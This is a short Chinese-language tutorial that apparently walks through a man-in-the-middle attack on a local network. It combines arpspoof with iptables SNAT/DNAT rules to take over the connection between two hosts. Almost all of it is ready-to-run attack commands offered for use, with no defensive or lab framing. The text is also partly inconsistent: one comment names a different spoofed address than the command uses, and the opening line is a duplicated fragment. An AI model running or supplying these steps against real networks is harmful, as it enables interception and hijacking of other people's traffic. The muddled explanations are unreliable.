目标主机:192.168.1.2 企图打开目的主机:192.168.1.3 的网页。此时,通过arp 欺骗和路由转发获取双方之间的连接。 首先启动iptables NAT 功能 sudo mod
目标主机:192.168.1.2 企图打开目的主机:192.168.1.3 的网页。此时,通过arp 欺骗和路由转发获取双方之间的连接。
- 首先启动iptables NAT 功能
sudo modprobe ip_tablessudo modprobe ip_nat_ftp
通过iptables 的 NAT地址欺骗,使得目的主机不知道谁链接的他。
- 添加一条NAT 指令:
sudo iptables -t nat -A POSTROUTING -s 192.168.1.2 -p tcp --dport 8080 -j SNAT --to 192.168.1.4
更改源地址为:192.168.1.2 ,目的端口为8080 的数据包的源地址为:192.168.1.4
sudo iptables -t nat -A PREROUTING -d 192.168.1.4 -p tcp --sport 8080 -j DNAT --to 192.168.1.2
将目的地址为192.168.1.4 ,源端口为8080 的tcp 数据包 的目的地址更改为192.168.1.2
- 同时
sudo arpspoof -t 192.168.1.3 192.168.1.4 -i eno1
告诉 192.168.1.3 我就是192.168.1.2
- 也可以直接
sudo iptables -t nat -A POSTROUTING -s 192.168.1.2 -j SNAT --to 192.168.1.4sudo iptables -t nat -A PREROUTING -d 192.168.1.4 -j DNAT --to 192.168.1.2
这样,能够全面接管他们之间的连接。